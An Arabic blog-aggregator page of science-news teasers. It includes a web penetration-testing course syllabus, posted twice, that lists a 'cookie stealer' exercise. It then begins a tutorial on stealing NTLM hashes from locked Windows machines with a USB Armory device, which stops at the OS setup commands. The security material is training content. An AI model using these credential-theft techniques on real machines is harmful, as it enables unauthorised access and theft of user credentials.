الجمعة، 29 ديسمبر 2017
الاثنين، 25 ديسمبر 2017
إليكم ما سيغيره مستقبل الطاقة الشمسية في حياتنا ومجتمعاتنا
ينتشر في الأوساط العلمية جدل كبير في شأن مستقبل الطاقة المتجددة، خاصة أنها مرتبطة بشكل أو بآخر بالنفط، لا بل بأسعار النفط التي تتغير بشكل يومي، وسنحاول في هذا المقال أن نعرض لكم شيئاً عما نظنه مستقبل الطاقة الشمسية تحديداً، كونها أكثر أنواع الطاقة المتجددة إنتشاراً وحباً للعلماء. الحقيقة التي يعتمد عليها جميع المتحمسين للطاقة […]
The post إليكم ما سيغيره مستقبل الطاقة الشمسية في حياتنا ومجتمعاتنا appeared first on مجلة نقطة العلمية.
by نقطة via مجلة نقطة العلمية
الأحد، 24 ديسمبر 2017
التثاؤب لفترة أطول يرتبط مع امتلاك دماغ أكبر
يعتبر التثاؤب واحد من أكبر الأسرار في الحياة، فما أن ترى شخصاً ما يتثائب، حتى تشعر بأنك بحاجة للتثاؤب أيضاً، وما أن تعبت ستشعر بحاجة للتثاؤب – ربما لحاجتك لإدخال المزيد من الأوكسجين إلى الدماغ- وما أن تشعر بالملل حتى تتثاءب، ولكن ما هو التثاؤب؟ ليس هناك إجابة قاطعة بعد، ولكن العلماء وجدوا صلة غريبة […]
The post التثاؤب لفترة أطول يرتبط مع امتلاك دماغ أكبر appeared first on مجلة نقطة العلمية.
by Diana via مجلة نقطة العلمية
الأربعاء، 20 ديسمبر 2017
لمحة سريعة حول كتاب Gut: The Inside Story of Our Body’s Most Underrated Organ
by يوغرطة بن علي (Youghourta Benali) via المجلة التقنية
الثلاثاء، 19 ديسمبر 2017
العمارة الحضرية الجميلة تعزز الصحة تماماً كالمساحات الخضراء
من المعروف أن أخذ نزهة في المناطق الريفية أوعلى الشواطئ يمكن أن يعزز من مزاج وصحة الشخص، وقد كان الخبراء منذ فترة طويلة يوصون بالخروج من المدينة لتحسين الصحة البدنية والعقلية. لكن دراسة جديدة تشير إلى أن العمارة الحضرية الجميلة، أو ضفاق الأنهار التي تمر من المدن يمكن أن يكون لها ذات القدر من التأثير […]
The post العمارة الحضرية الجميلة تعزز الصحة تماماً كالمساحات الخضراء appeared first on مجلة نقطة العلمية.
by Diana via مجلة نقطة العلمية
الخميس، 14 ديسمبر 2017
لمحة سريعة حول كتاب العناصر الخمسة للتفكير الفعّال The 5 Elements of Effective Thinking
by يوغرطة بن علي (Youghourta Benali) via المجلة التقنية
الثلاثاء، 12 ديسمبر 2017
لاعب جديد في ساحة الفضاء هذه المرة عملاق صناعة الطائرات بوينج
لطالما كان الفضاء حلم الجميع، لكن هذا الحلم كان محصورا على لاعبين محددين، واحدة منهم وكالة الفضاء الدولية ناسا، أو مؤسسات علمية حكومية اخرى. حيث كان الفضاء حكرا على الحكومات حتى وقت قريب. دخلت الشركات الخاصة على خط الفضاء بداية بشركة Space X والتي تعتبر إحدى أهم الشركات الخاصة الرائدة في هذا المجال، بالإضافة إلى […]
The post لاعب جديد في ساحة الفضاء هذه المرة عملاق صناعة الطائرات بوينج appeared first on مجلة نقطة العلمية.
by نقطة via مجلة نقطة العلمية
السبت، 9 ديسمبر 2017
لمحة سريعة حول كتاب “Algorithms to Live By”
by يوغرطة بن علي (Youghourta Benali) via المجلة التقنية
الأربعاء، 6 ديسمبر 2017
الثلاثاء، 5 ديسمبر 2017
المغرب يطلق أول قمر صناعي خاص به وذلك للمراقبة
أطلق المغرب صباح يوم الأربعاء 08 نونبر 2017، على الساعة 1:45 دقيقة بتوقيت غرينتش، أول قمر صناعي للمراقبة من نوع “بلياد أستريوم”، انطلاقا من قاعدة كورو الفرنسية التابعة لمنطقة جويانا بأمريكا الجنوبية. يهدف المغرب من خلال هذا القمر الصناعي المتطور، إلى تعزيز قدرات المملكة الأمنية والاستخباراتية ومراقبة الحدود البرية والبحرية والجوية. كما سيتم الاستعانة به […]
The post المغرب يطلق أول قمر صناعي خاص به وذلك للمراقبة appeared first on مجلة نقطة العلمية.
by نقطة via مجلة نقطة العلمية
السبت، 2 ديسمبر 2017
تسعة أعوام على برنامج نجوم العلوم فأين وصل وماذا قدم
نقطة تحاور عددا من الفائزين السابقين في أول مسابقة علمية عربية. تسعة أعوام منذ بدأت أول تجربة عربية في مجال العلوم والتكنلوجيا، أتيحت الفرصة لعدد من الشباب العربي لتمكنوا من تقديم حلول حقيقية لمشاكل المنطقة التي باتت تعج بالكثير من المعضلات لكنها ايضا تحوي الكثير من الأمل. فيما يتنافس ٤ متسابقين على اللقب التاسع ( […]
The post تسعة أعوام على برنامج نجوم العلوم فأين وصل وماذا قدم appeared first on مجلة نقطة العلمية.
by aaouir via مجلة نقطة العلمية
الأربعاء، 29 نوفمبر 2017
حقائق وخرافات حول السفر عبر النجوم
قدّم لنا كتّاب الخيال العلمي والمخرجين تصورات لا تعد ولا تحصى عن انتشار البشر في جميع أنحاء الكون، وهذا قد يجعلنا نعتقد لوهلة أن الأمر أصبح في متناول أيدينا بالفعل، إلّا أن الحقيقة وللأسف، هي أنه لا يزال لدينا أكثر من مجرد عدد قليل من المشاكل التقنية لنتخطاها – كالقوانين الفيزيائية – قبل أن نتمكن […]
The post حقائق وخرافات حول السفر عبر النجوم appeared first on مجلة نقطة العلمية.
by Diana via مجلة نقطة العلمية
الأحد، 26 نوفمبر 2017
السبت، 18 نوفمبر 2017
الاثنين، 13 نوفمبر 2017
الأربعاء، 8 نوفمبر 2017
ستة مبتكرين يتأهلون لنصف نهائيات نجوم العلوم
شهد برنامج نجوم العلوم حلقة حافلة بالأحداث مع خروج مبتكر واعد من المنافسة. انتهت رحلة حسينة باشا، طالبة الصيدلة التي آلت على نفسها تحسين حياة الأطفال من خلال “الفاحص الآلي لعيون الأطفال”. وأفسح خروج حسينة المجال أمام مشعل الشهراني ووسيم الحريري لاجتياز المواجهة مع لجنة التحكيم والتأهل للمرحلة التالية. وخلال الحلقتين المقبلتين، سيدخل المبتكرون الباقون […]
The post ستة مبتكرين يتأهلون لنصف نهائيات نجوم العلوم appeared first on مجلة نقطة العلمية.
by نقطة via مجلة نقطة العلمية
الاثنين، 6 نوفمبر 2017
التمويل المجتمعي – كيف يتغير مفهوم كل شي حولنا
تطفوا على السطح مؤخرا وبشكل متسارع ظاهرة المشاريع الممولة من قبل الجمهور، والتي أخذت تتزايد بشكل كبير في الأونة الأخيرة، ولعل الإطلاع على بعض تفاصيلها يعطينا صورة حول السوق العالمية وإلى أين ستتوجه خلال الفترة القريبة القادمة. حيث نشرت شركة الأبحاث البريطانية beauhurst أن 21% من جميع ما يعرف بالـ equity investment في بريطانيا كان […]
The post التمويل المجتمعي – كيف يتغير مفهوم كل شي حولنا appeared first on مجلة نقطة العلمية.
by aaouir via مجلة نقطة العلمية
الأحد، 29 أكتوبر 2017
تأهل مبتكريَن للمرحلة المقبلة في ” نجوم العلوم “
انطلاق مرحلة “نمذجة المنتج” ضمن المبادرة الإعلامية لمؤسسة قطر وضعت لجنة تحكيم برنامج نجوم العلوم ثلاثة من المبتكرين العرب الشباب على المحكّ ضمن جولات نمذجة المنتج هذا الأسبوع. ووقع اختيار اللجنة على الشاب محمد الجفيري وزميله أحمد نبيل، اللذين نجحا في العبور إلى المرحلة التالية لإكمال مشوارهم في البرنامج، تاركين بأسى زميلهما وسام منشي الذي […]
The post تأهل مبتكريَن للمرحلة المقبلة في ” نجوم العلوم “ appeared first on مجلة نقطة العلمية.
by نقطة via مجلة نقطة العلمية
السبت، 28 أكتوبر 2017
لمحة سريعة حول كتاب “ اعمل أربع ساعات فقط في الأسبوع” The 4-Hour Workweek
by يوغرطة بن علي (Youghourta Benali) via المجلة التقنية
الأحد، 22 أكتوبر 2017
السبت، 14 أكتوبر 2017
الجمعة، 13 أكتوبر 2017
مرحلة التصفيات الأولى في برنامج نجوم العلوم
كما هو الحال كل عام، يبرز برنامج نجوم العلوم أهم العلماء والمخترعين العرب، يقدمون العديد من الأفكار التي من المتوقع أن تغير حياة أناس كثيرون إلى الأفضل. وكما هي العادة، يجتمع عدد من المخترعين، ليقدموا أفضل ما لديهم ضمن مسابقة سنوية لإختيار أفضل مبتكر في العالم العربي، وذلك ضمن مهمة صعبة ومنافسة قوية يخوضها المتسابقون. […]
The post مرحلة التصفيات الأولى في برنامج نجوم العلوم appeared first on مجلة نقطة العلمية.
by نقطة via مجلة نقطة العلمية
الأربعاء، 11 أكتوبر 2017
الاثنين، 9 أكتوبر 2017
السبت، 7 أكتوبر 2017
الثلاثاء، 3 أكتوبر 2017
الاثنين، 2 أكتوبر 2017
إنطلاق كورس إختبار إختراق تطبيقات الويب باللغة العربية مجانا
السلام عليكم ورحمة الله وبركاته أحبتي في الله.
يسر مدونة مجتمع الحماية العربي أن تعلن عن إطلاق كورس إختبار إختراق تطبيقات الويب باللغة العربية
Web Applications Penetration Testing Course
واللذي يشرح بالتفصيل ثغرات المواقع مع أمثلة عمليه علي شركات عالمية عن كيفية حدوث الثغرات وكيف يتم إستغلالها.
تم التركيز في الكورس علي وضع أساسيات مهمه جدا لابد وأن يفهمها كل مختبر إختراق قبل البدأ في إكتشاف وإستغلال الثغرات.
ما اللذي سيتم شرحه في الكورس:
Introduction Day:
1. Course Requirements:
Installing necessary browser plugins (Wappalyzer, FlagFox, FoxyProxy)
Virtualbox + Ubuntu
Java & Burp Suite
First session (Warming Up):
Deep dive into data leaks (Haveibeenpwned.com & Shodan.io)
Part 1:
1. Linux Basics:
Introduction to Linux Structure & files permissions.
Packages & installation process
Command line examples
(man, apt-get, apt-cache, find, grep, cut, sort, curl, wget, >, >>, |, ;, head, tail, nano, touch, &, ps, df, top)
Installing LAMP stack.
2. Introduction Topics:
1- OSI Model in a Nutshell (Life of a Packet)
2- Wireshark & NetworkMiner
3- TCP/UDP/HTTP/HTTPS Protocols
3- Nmap basics
4- HTTP Methods & HTTP Response Types
5- HTTP Headers
6- Web Authentication Methods, Cookies, Sessions
7- Encryption, Encoding, Hashing
10- DNS Basics, A, MX, CNAME Records
11- PTR Records (Reverse DNS) & PassiveDNS (Yahoo or Facebook Example)
12- What happens when I open http://ift.tt/g8FRpY in my browser?
13- Basic PHP examples (GET vs POST)
14. CORS, CSP & SOP
3. BurpSuite:
1- What is Burp and why we need it?
2- A Jurney into Burp Tabs
3- Burp configuration
4- Get your hands dirty using burp
Part 2:
1. Easy Web Applications Attacks:
1- HTTP Verb Tampering Attack
2- Open Redirection
3- Host Header Attacks
4- Session Fixation
5- Text Injection & HTML Injection
6- ClickJacking
5- Insecure Direct Object Reference (IDOR)
6- Hanging Fruits (Forgotten backup files and status pages)
2. Meduim Web Applications Vulnerabilities:
1. Cross Site Scripting (XSS)
1- Basics of XSS
2- Reflected, Stored & DOM based XSS
3- XSS Payloads
3- Google XSS challenges step by step
4- Your task is to write and test XSS Cookie stealer
2. Cross Site Request Forgery (CSRF)
1- CSRF Basics
2- How to find a CSRF Vulnerability
3- CSRF Exploitation
3. Subdomain Takeover
Part 3:
1. Advanced Web Applications Vulnerabilities:
1. SQL Injection
1- SQL Basics
2- SQL Injection Basics & SQL Types (Union Based, Boolean Based, Time Based)
3- Manual Union Based SQL Injection Exploitation
4- Manual Boolean Based SQL Injection Exploitation
5- Manual Time Based SQL Injection Exploitation
6- A Walk through SQLMAP
7- Exploiting SQL Injection Vulnerabilities with SQLMAP
2. Server Side Request Forgery (SSRF)
1- SSRF Basics
2- How to find SSRF Vulnerabilities
3- SSRF Exploitation Demo
4- SSRF vs XSPF
3. Remote Command Execution
1- RCE Basics
2- How to find RCE Bugs in the Source Code (Example on PHP)
3- RCE Exploitation Demo (ShellShock or else from my findings)
4. Remote Code Execution
1- RCE Basics
2- How to find RCE Bugs in the Source Code
3- RCE Exploitation Demo on Yahoo
5. Local/Remote File Inclusion
6. XXE (External Entity Injection)
7. CSTI & SSTI (Client/Server Side Template Injection)
7. Object Injection Vulnerabilities
8. File Upload Attacks
1- Bypassing file uploads security restrictions (Multiple methods)
2- Demo on Twitter.com
Part 4:
8. Real Life Demo
1. Enumerating and scanning 200.000+ Yahoo Hostname!
9. Conclusion & References
بفضل من الله عز وجل إنتهينا في الوقت الحالي من تسجيل 23 درس وتم طرحهم جميعا علي Playlist واحده يتم تحديثها بشكل اسبوعي بدروس جديدة من الكورس. يمكنكم مشاهدة الدروس من خلال الرابط التالي:
معلومات يجب أن تعرفها عن الكورس:
١- دروس الكورس يتم تحديثها وطرح دروس جديدة يوم الأحد من كل اسبوع, لذا ننصحك بالإشتراك في القناة حتي يصلك الجديد أول بأول
٢- تم إنشاء جروب علي الفيس بوك خاص بالكورس حتي يتثني لمن لديه أي سؤال او لديه صعوبة في فهم شئ ما من طرح أسالته وسيتم الإجابه عليها من قبل المختصين إن شاء الله. رابط جروب الفيس بوك:
http://ift.tt/2yUwORw
٣- الكورس مجاني وسيظل مجاني حتي إنتهائه إن شاء الله ولا نسألكم سوي الدعاء لي ولوالدي بالرحمه والمغفرة
٤- الدروس التي تم الإنتهاء منها كانت شروحات للاساسيات التي يحتاجها أي مختبر إختراق, والدروس القادمة ان شاء الله بدأ من الأحد القادم ستكون مختصة بالويب Web فقط
٥- تحتاج أن تقرأ البوست التالي قبل أن تبدأ في الكورس لأنه يحتوي علي إجابات لإسئله كثيرة يتم سؤالها بشكل مستمر:
http://ift.tt/2ykOqJA
٦- تم تجهيز lab للمتدربين في الكورس حتي يتمكنوا من التطبيق العملي وحل مسابقات تمكنهم من تطوير مهاراتهم في مجال اختبار الإختراق. ال Lab الأول واللذي يخص الدروس التي تم الإنتهاء منها يمكنكم الوصول إليه من خلال الرابط التالي ويمكنكم أيضا طرح أسالتكم في نفس الرابط. هل يمكنكم حله وتخطيه؟
http://ift.tt/2ykOqJA
٧- ال Lab الخاص بثغرات الويب سيتم طرحه فور البدأ بشرح ثغرات ال SQL Injection ان شاء الله
وفي الأخير أود أن أشكر كل من الأشخاص التالية أسماءهم لمساهمتهم في أن يخرج الكورس بهذا الشكل ومساهمتهم في الإجابة علي أسالة المتدربين بشكل مستمر:
محمود علام
محمد عبدالعاطي
أحمد أبوالعلا
اسامه النجار
راجين من الله عز وجل أن نكون عند حسن ظنكم بنا.
by ابراهيم حجازي via مجتمع الحماية العربي
إنطلاق كورس إختبار إختراق تطبيقات الويب باللغة العربية مجانا
السلام عليكم ورحمة الله وبركاته أحبتي في الله.
يسر مدونة مجتمع الحماية العربي أن تعلن عن إطلاق كورس إختبار إختراق تطبيقات الويب باللغة العربية
Web Applications Penetration Testing Course
واللذي يشرح بالتفصيل ثغرات المواقع مع أمثلة عمليه علي شركات عالمية عن كيفية حدوث الثغرات وكيف يتم إستغلالها.
تم التركيز في الكورس علي وضع أساسيات مهمه جدا لابد وأن يفهمها كل مختبر إختراق قبل البدأ في إكتشاف وإستغلال الثغرات.
ما اللذي سيتم شرحه في الكورس:
Introduction Day:
1. Course Requirements:
Installing necessary browser plugins (Wappalyzer, FlagFox, FoxyProxy)
Virtualbox + Ubuntu
Java & Burp Suite
First session (Warming Up):
Deep dive into data leaks (Haveibeenpwned.com & Shodan.io)
Part 1:
1. Linux Basics:
Introduction to Linux Structure & files permissions.
Packages & installation process
Command line examples
(man, apt-get, apt-cache, find, grep, cut, sort, curl, wget, >, >>, |, ;, head, tail, nano, touch, &, ps, df, top)
Installing LAMP stack.
2. Introduction Topics:
1- OSI Model in a Nutshell (Life of a Packet)
2- Wireshark & NetworkMiner
3- TCP/UDP/HTTP/HTTPS Protocols
3- Nmap basics
4- HTTP Methods & HTTP Response Types
5- HTTP Headers
6- Web Authentication Methods, Cookies, Sessions
7- Encryption, Encoding, Hashing
10- DNS Basics, A, MX, CNAME Records
11- PTR Records (Reverse DNS) & PassiveDNS (Yahoo or Facebook Example)
12- What happens when I open http://ift.tt/g8FRpY in my browser?
13- Basic PHP examples (GET vs POST)
14. CORS, CSP & SOP
3. BurpSuite:
1- What is Burp and why we need it?
2- A Jurney into Burp Tabs
3- Burp configuration
4- Get your hands dirty using burp
Part 2:
1. Easy Web Applications Attacks:
1- HTTP Verb Tampering Attack
2- Open Redirection
3- Host Header Attacks
4- Session Fixation
5- Text Injection & HTML Injection
6- ClickJacking
5- Insecure Direct Object Reference (IDOR)
6- Hanging Fruits (Forgotten backup files and status pages)
2. Meduim Web Applications Vulnerabilities:
1. Cross Site Scripting (XSS)
1- Basics of XSS
2- Reflected, Stored & DOM based XSS
3- XSS Payloads
3- Google XSS challenges step by step
4- Your task is to write and test XSS Cookie stealer
2. Cross Site Request Forgery (CSRF)
1- CSRF Basics
2- How to find a CSRF Vulnerability
3- CSRF Exploitation
3. Subdomain Takeover
Part 3:
1. Advanced Web Applications Vulnerabilities:
1. SQL Injection
1- SQL Basics
2- SQL Injection Basics & SQL Types (Union Based, Boolean Based, Time Based)
3- Manual Union Based SQL Injection Exploitation
4- Manual Boolean Based SQL Injection Exploitation
5- Manual Time Based SQL Injection Exploitation
6- A Walk through SQLMAP
7- Exploiting SQL Injection Vulnerabilities with SQLMAP
2. Server Side Request Forgery (SSRF)
1- SSRF Basics
2- How to find SSRF Vulnerabilities
3- SSRF Exploitation Demo
4- SSRF vs XSPF
3. Remote Command Execution
1- RCE Basics
2- How to find RCE Bugs in the Source Code (Example on PHP)
3- RCE Exploitation Demo (ShellShock or else from my findings)
4. Remote Code Execution
1- RCE Basics
2- How to find RCE Bugs in the Source Code
3- RCE Exploitation Demo on Yahoo
5. Local/Remote File Inclusion
6. XXE (External Entity Injection)
7. CSTI & SSTI (Client/Server Side Template Injection)
7. Object Injection Vulnerabilities
8. File Upload Attacks
1- Bypassing file uploads security restrictions (Multiple methods)
2- Demo on Twitter.com
Part 4:
8. Real Life Demo
1. Enumerating and scanning 200.000+ Yahoo Hostname!
9. Conclusion & References
بفضل من الله عز وجل إنتهينا في الوقت الحالي من تسجيل 23 درس وتم طرحهم جميعا علي Playlist واحده يتم تحديثها بشكل اسبوعي بدروس جديدة من الكورس. يمكنكم مشاهدة الدروس من خلال الرابط التالي:
معلومات يجب أن تعرفها عن الكورس:
١- دروس الكورس يتم تحديثها وطرح دروس جديدة يوم الأحد من كل اسبوع, لذا ننصحك بالإشتراك في القناة حتي يصلك الجديد أول بأول
٢- تم إنشاء جروب علي الفيس بوك خاص بالكورس حتي يتثني لمن لديه أي سؤال او لديه صعوبة في فهم شئ ما من طرح أسالته وسيتم الإجابه عليها من قبل المختصين إن شاء الله. رابط جروب الفيس بوك:
http://ift.tt/2yUwORw
٣- الكورس مجاني وسيظل مجاني حتي إنتهائه إن شاء الله ولا نسألكم سوي الدعاء لي ولوالدي بالرحمه والمغفرة
٤- الدروس التي تم الإنتهاء منها كانت شروحات للاساسيات التي يحتاجها أي مختبر إختراق, والدروس القادمة ان شاء الله بدأ من الأحد القادم ستكون مختصة بالويب Web فقط
٥- تحتاج أن تقرأ البوست التالي قبل أن تبدأ في الكورس لأنه يحتوي علي إجابات لإسئله كثيرة يتم سؤالها بشكل مستمر:
http://ift.tt/2ykOqJA
٦- تم تجهيز lab للمتدربين في الكورس حتي يتمكنوا من التطبيق العملي وحل مسابقات تمكنهم من تطوير مهاراتهم في مجال اختبار الإختراق. ال Lab الأول واللذي يخص الدروس التي تم الإنتهاء منها يمكنكم الوصول إليه من خلال الرابط التالي ويمكنكم أيضا طرح أسالتكم في نفس الرابط. هل يمكنكم حله وتخطيه؟
http://ift.tt/2ykOqJA
٧- ال Lab الخاص بثغرات الويب سيتم طرحه فور البدأ بشرح ثغرات ال SQL Injection ان شاء الله
وفي الأخير أود أن أشكر كل من الأشخاص التالية أسماءهم لمساهمتهم في أن يخرج الكورس بهذا الشكل ومساهمتهم في الإجابة علي أسالة المتدربين بشكل مستمر:
محمود علام
محمد عبدالعاطي
أحمد أبوالعلا
اسامه النجار
راجين من الله عز وجل أن نكون عند حسن ظنكم بنا.
by ابراهيم حجازي via مجتمع الحماية العربي
الأربعاء، 20 سبتمبر 2017
الخميس، 14 سبتمبر 2017
أمراض غريبة ليس لها علاج حتى الآن
هناك العديد من الأمراض المستعصية والنادرة جداً والتي لا يتجاوز عدد المصابين بها عدد أصابع اليد الواحدة، وفيما يلي نسلط الضوء على أكثر 10 أمراض غرابة وندرة والتي لا نمتلك لها علاجاً حتى الآن، بما في ذلك حالة لم يعاني منها سوى إنسان واحد فقط. مرض السيلرز (ماندي سيلرز) التي تم تسمية المرض على اسمها، […]
The post أمراض غريبة ليس لها علاج حتى الآن appeared first on مجلة نقطة العلمية.
by Diana via مجلة نقطة العلمية
الخميس، 7 سبتمبر 2017
لماذا نستيقظ للتبول في بعض الليالي؟
عادة ما تصيب هذه الحالة الرجال من كبار السن والنساء الحوامل، ولكن ليس من الضروري أن تكون متقدماً في السن أو حامل حتى تمر بهذه التجربة، فبحسب (ليزا هاويس)، وهي طبيبة أخصائية في المسالك البولية، فإن الزيارات المتكررة للحمام أثناء الليل يمكن أن تكون مؤشراً لوجود مشكلة صحية أخرى أو ببساطة مجرد عادة. على سبيل […]
The post لماذا نستيقظ للتبول في بعض الليالي؟ appeared first on مجلة نقطة العلمية.
by Diana via مجلة نقطة العلمية
الثلاثاء، 15 أغسطس 2017
الأحد، 30 يوليو 2017
الخميس، 27 يوليو 2017
الاثنين، 24 يوليو 2017
من وجهة نظر علم النفس، لماذا تنتشر بيننا ثقافة إلقاء اللوم على الضحية؟
تأخذ ثقافة إلقاء اللوم على الضحية أشكالاً كثيرة، وتكون في كثير من الأحيان مبطنة وغير مباشرة، وكثيراً ما نراها في حالات الاغتصاب والاعتداء الجنسي، ولكنها قد تظهر أيضاً في حالات الجرائم الأكثر بساطة، مثل تعرض شخص للنشل أو السرقة ومن ثم إلقاء اللوم عليه لأنه كان يضع محفظته في جيبه الخلفي، ولكن بشكل عام، في […]
The post من وجهة نظر علم النفس، لماذا تنتشر بيننا ثقافة إلقاء اللوم على الضحية؟ appeared first on مجلة نقطة العلمية.
by Diana via مجلة نقطة العلمية
السبت، 22 يوليو 2017
هل يمكن ان ينتج حمل عن عضو ذكري مزروع؟
ترجمة: انا اصدق العلم قام رجل من جنوب افريقيا بجعل صديقته حاملاً بعد أن مرّ بعميلة زراعة لعضوه الذكري إذ فقده، وفقاً لتقارير الأخبار، لكن وفقاً للدكتور آندريو كرامر، عالم أمراض مختص بالمسالك البولية، في مركز جامعة ماريلاند الطبي والذي لم يكن مشاركاً في العملية، لا يزال من غير الواضح إن كان قضيب الرجل يعمل […]
The post هل يمكن ان ينتج حمل عن عضو ذكري مزروع؟ appeared first on مجلة نقطة العلمية.
by نقطة via مجلة نقطة العلمية
الأربعاء، 12 يوليو 2017
الاثنين، 10 يوليو 2017
البيولوجيا حين تكون أيديولوجيا
في عام 1990 ألقى عالم الأحياء التطوّرية ريتشارد لوينتون سلسة محاضرات عبر الإذاعة الكندية عَنوَنها: “البيولوجيا حين تكون أيديولوجيا”. شكّل هذا العمل نقدًا رصينًا ولاذعًا للدور الذي يلعبه العلم (وتحديدا: علم الأحياء وعلم الطبّ) في تبرير التفاوت بين الطبقات الاجتماعية وبين الجنسين وبين الأعراق بدعوى أن هذا التفاوت طبيعيٌ ولازمٌ. يطرح لوينتون نظرةً تفسيريةً بديلةً، ودفاعًا عن […]
The post البيولوجيا حين تكون أيديولوجيا appeared first on مجلة نقطة العلمية.
by نقطة via مجلة نقطة العلمية
الثلاثاء، 4 يوليو 2017
ما هي العلاقة بين الشخصية النرجسية والسادية؟
النرجسية هي مصطلح واسع يستخدم للإشارة إلى مجموعة من سمات الشخصية المشتركة وأيضاً إلى اضطراب سريري معروف باسم اضطراب الشخصية النرجسية، وهو أسلوب حاد ومتغلغل في الشخصية، يحدد النهج الذي يتبعه الفرد مع الآخرين والعالم من حوله. من الصعب على الأشخاص غير النرجسيين فهم الشخصية النرجسية، وذلك لأن تصرفات النرجسي الخارجية تبدو مختلفة تماماً عما […]
The post ما هي العلاقة بين الشخصية النرجسية والسادية؟ appeared first on مجلة نقطة العلمية.
by Diana via مجلة نقطة العلمية
الجمعة، 30 يونيو 2017
تعريض بشرة الأطفال للشمس لتسميرها “ليس صحيا”
بي بي سي عربي نصحت خدمة الرعاية الصحية وهيئة الأرصاد الجوية في بريطانيا الآباء بأن تعريض بشرة الأطفال للشمس لإكسابها سمرة يعد علامة على اعتلال الجلد، وليس الصحة، وذلك بعد أيام من موجة حارة اجتاحت البلد. وأشار استطلاع إلى أن ثلث الآباء في بريطانيا يعتقدون على نحو خاطئ أن تغير لون الجلد إلى البني جيد […]
The post تعريض بشرة الأطفال للشمس لتسميرها “ليس صحيا” appeared first on مجلة نقطة العلمية.
by نقطة via مجلة نقطة العلمية
الخميس، 29 يونيو 2017
لصقة “غير مؤلمة” للقاح الانفلونزا تجتاز اختبارات مهمة
*بي بي سي عربي اجتازت لصقة حاقنة للقاح الانفلونزا “غير مؤلمة” اختبارات سلامة هامة في أول تجربة على البشر. وعلى الجانب اللاصق منها، تحتوي اللصقة على 100 إبرة شبيهة بالشعر تخترق سطح الجلد. وتتميز اللصقة الجديدة بسهولة الاستخدام، بحيث يمكن للناس لصقها بأنفسهم. ومن شأن سهولة الاستخدام أن تساعد على تحصين المزيد من الأشخاص ضد […]
The post لصقة “غير مؤلمة” للقاح الانفلونزا تجتاز اختبارات مهمة appeared first on مجلة نقطة العلمية.
by نقطة via مجلة نقطة العلمية
هل تخاف مرض السكري؟ إليك بعضاً من علاماته التحذيرية المبكرة
يعتبر مرض السكري أحد الحالات الصحية الأكثر انتشاراً في عالمنا اليوم، فهو يؤثر على أكثر من 29 مليون شخصاً في أمريكا وحدها، ويعزى تزايد حالات الإصابة بمرض السكري جزئياً إلى حقيقة أن الكثيرين منا يجهلون هذا المرض، وذلك على الرغم من أننا نعتقد بأننا نعرف كل شيء عنه. من المعروف أن مرض السكري يؤثر على […]
The post هل تخاف مرض السكري؟ إليك بعضاً من علاماته التحذيرية المبكرة appeared first on مجلة نقطة العلمية.
by نقطة via مجلة نقطة العلمية
السبت، 24 يونيو 2017
سرقة الصلاحيات من جهاز ويندوز مغلق باستخدام USB Armory
USB Armory
موضوعنا اليوم هو موضوع جميل ومهم جدا لل pentester و ال red teamer ويصنف تحت ال Physical Social Engineering Attack. اليوم سنتعلم كيفية سرقة ال NTLM hashes من جهاز ويندوز حتى لو كان الجهاز في Locked باستخدام USB Armory device.
نستفيد من هاشات ال NTLM في سيناريوهات كثيرة منها على سبيل الذكر لا الحصر
- الدخول على ال Shared folders
- أو في هجمات ال PTH على الجهاز أو على الخوادم التي قد يدخلها المستخدم من جهازه المستهدف
- تنفيذ أوامر عن بعد على الجهاز المستهدف باستخدام psexec
- محاول كسر الهاش و الحصول على كلمة المرور الحقيقة باستخدام أداة hashcat (قد تستغرق وقت طويل جدا)
- إلخ
الجدير بالذكر هنا أنه لن تعيقنا أي Group policy تمنع استخدام ال USB storage لان الكمبوتر المستهدف سيتعرف عليه على أنه USB Ethernet device.
ما هو جهاز USB Armory ؟
ببساطة, هو عبارة عن جهاز كومبيوتر بحجم Flash drive. تستطيع أن تثبت عليه نظام تشغيل وتتعامل معه بكامل خصائص نظام التشغيل. مكونات USB Armory المادية أو ال Hardware مفتوحة المصدر, بمعنى أنك تستطيع أن تطلع على تفاصيل تصميم الجهاز والتغيير في مكوناته كما تشاء.
قامت شركة InversePath والتي تم الاستحواذ عليها من شركة F-Secure والمتخصصة في عمل أجهزة بنية تحتية آمنة.
سعر الجهاز هو 155 دولار أمريكي
يحتوي جهاز USB armory على microSDcard كوحدة تخزين وهنا قائمة بال microSD cards المدعومة رسمية ولكنها لا تنحصر في هذه القائمة. فكل ال microSDcard الحديثة مدعومة ولكن يفضل أن تكون ذات سرعة عالية في القراءة والكتابة. أشهر الأنواع المدعومة والمتوفرة في جميع الدول العربية هي SanDisk لكن بشرط أن تكون Ultra. وحدة التخزين هذه هي التي تحتوي على نظام التشغيل والذي سنغطي اليوم طريقة تحميل و تثبيت و إعداد النظام عليها.
الخطوة الأولى:/ تحميل نظام التشغيل وتثبيته
في البداية نذهب إلى صفحة انظمة التشغيل المدعومة رسميا من هنا. كما أحبذ أن نستخدم نسخة USB armory base images. قد يستغرب عدم اختيارالنسخة ال Kali لكن بعد بحث وجدت أن نسخة الكالي يشتكي بعض الناس منها ووجود بعض ال Bugs في منصة ARM لهذا. كما أن النسخة التي اخترتها هي نفس ما تستخدمه الكالي تماما ولا شي مختلف على الإطلاق بل بالعكس تأتي النسخة مجردة تماما من جميع البرامج مما يجعلها صغيرة الحجم وسريعة.
الأن نذهب إلى الرابط تحميل النظام ونحمل أخر image موجودة. حاليا النسخة (usbarmory-debian_jessie-base_image-20170518.raw.zip) هي الأحدث حتى تاريخ كتابة هذا المقال.
1. تحميل النظام
wget -c http://ift.tt/2s9nwwD
نتأكد من أن أننا حملنا النسخة بشكل سليم
sha256sum usbarmory-debian_jessie-base_image-20170518.raw.zip
يجب أن تكون المخرجات كما في الصفحة التحميل الرسمية.
نفك ضغط النظام
unzip usbarmory-debian_jessie-base_image-20170518.raw.zip
ينتج عنه ملف
usbarmory-debian_jessie-base_image-20170518.raw
2. معرفة مكان أو تسمية ال microSD card في الجهاز
الآن دخل ال micro SD card في جهازك, جهاز الكمبيوتر الخاص بك وليس ال USB armory. ثم اعرض جميع وحدات التخزين الموجودة في جهازك
fdisk -l
في حالة جهازي كان تسمية ال SD cards هي /dev/sdc وقد تخلف التسمية عنده. كن حذر جدا هنا لأن في مرحلة الثبيت لو اخترت وحدة تخزين خاطئة ستقوم بمسح كل ما على تلك وحدة ووضع نظام التشغيل عليها! لهذا وجب التنبيه
3. تثبيت النظام على ال microSD card
بصلاحيات ال root نفذ الأمر التالي: (انبته لمسار وحدة التخزين هنا)
